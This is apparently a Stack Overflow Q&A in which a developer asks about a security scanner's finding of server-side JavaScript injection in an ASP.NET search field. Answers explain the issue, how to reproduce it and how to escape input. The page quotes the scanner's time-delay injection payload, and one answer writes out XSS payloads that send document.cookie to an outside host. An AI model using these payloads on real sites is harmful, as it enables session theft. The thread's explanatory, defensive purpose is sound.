4

A security scan of an ASP.NET web site we are developing reported the following on an input field used for a search:

"The ctl00%24txtTopQckSearch parameter appears to be vulnerable to server-side JavaScript code injection attacks. The submitted value appears to be placed into a dynamically evaluated JavaScript statement, within a single-quoted context.

The payload '+(function(){if(typeof cb715==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);cb715=1;}}())+' was submitted in the ctl00%24txtTopQckSearch parameter. The application took 7641 milliseconds to respond to the request, compared with 5625 milliseconds for the original request, indicating that the injected JavaScript code caused a time delay.

Please note that to manually reproduce this behavior using the reported request, you will need to change the name of the canary variable, which is currently cb715."

My questions are:

What is "Server-Side JavaScript code injection" (as opposed to Client-Side Injection -XSS)?

How can I manually recreate the server side attack described above?

How can it be prevented?

Thanks!

Improve this question
2
  • 2
    It means that the injected code appeared to actually execute on your page. The security scan timed the function with and without the injected code, observed that it took longer with the code than without, and concluded that the code actually executed. Commented Jan 10, 2015 at 17:39
  • 1
    Code injection is where you find an input on the page that normally just takes a number or a string, and stick some actual Javascript code in there. If it executes, hilarity ensues. Commented Jan 10, 2015 at 17:40

2 Answers 2

Reset to default
3

What is "Server-Side JavaScript code injection" (as opposed to Client-Side Injection -XSS)?

It is a vulnerability that allows an attacker to execute their JavaScript code on your server (as opposed to in someone's browser).

How can I manually recreate the server side attack described above?

The report refers to a txtTopQckSearch control and says that it passed in the value +(function(){if(typeof cb715==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);cb715=1;}}())+ for that control.

So you can try to recreate it by

  1. Figuring out which page is using a control with that name
  2. Entering that JavaScript into that control (but changing the two occurrences of cb715 to a different name)
  3. Submitting the page

If the scan's findings are correct, that request should take slightly longer than a request that doesn't use that value.

How can it be prevented?

Track down the txtTopQckSearch control and ensure that values received via that control are never concatenated into any code that is executed on your server.

I think it's entirely possible that this is a red herring and that the request just took a bit longer due to some fluctuation on your server (the fact that the "safe" request to that page took >5 seconds suggests that the page might have some performance problems).

One good reason to suspect that it is a red herring is that if that code had run to completion before your server sent back a response, the difference in response time would have been 20 seconds as opposed to the 2 second difference that the scan observed.

So investigate to see if there are any possible security holes with that control, and if not, write it off for now as a false positive.

Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

Thanks for the detailed response. Yep, ended up being a red herring as no JavaScript was actually executed. However, it did expose some filtering and performance issues.
2

They can inject JavaScript code. It's an XSS vulnerability.

If you have this code (don't know ASP sorry):

<div><?php echo $_GET["foo"];?></div>

It will pretty much print whatever you pass as foo. So if you get someone to load:

http://yoursite.com/index.php?foo=<script>document.location.href="http://mywebsite.com/?cookie=" + document.cookie</script>

I have now stolen their session. It injects a piece of JavaScript code that reads the cookies and sends it to my website.

A similar approach exists in JavaScript directly:

<script>var data = <?php echo $_GET["foo"];?>;</script>

Now if the value of foo is something like 

"";document.location.href="http://mywebsite.com/?cookie=" + document.cookie`

I have again stolen cookies.

The way to avoid XSS is to always always always escape untrusted content. In PHP the functions are htmlspecialchars (for HTML) and json_encode (for JavaScript).

They detect the XSS vulnerability by injecting code that takes a long time to execute (creating 20000 Date objects) and comparing how long it takes to load the page.

Improve this answer

3 Comments

Thanks for the quick response. The scan called it "Server-Side JavaScript Injection". So I guess my real question is how is that different from "Client-Side JavaScript" injection (XSS)?
I think that's mislabeled. Unless your technology also includes server-side JavaScript execution like Node.JS
@Jobrocol: I think this is code injection that executes on the server rather than XSS (as JLRishe says). Most likely a false positive if you're not using Node.JS or similar.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.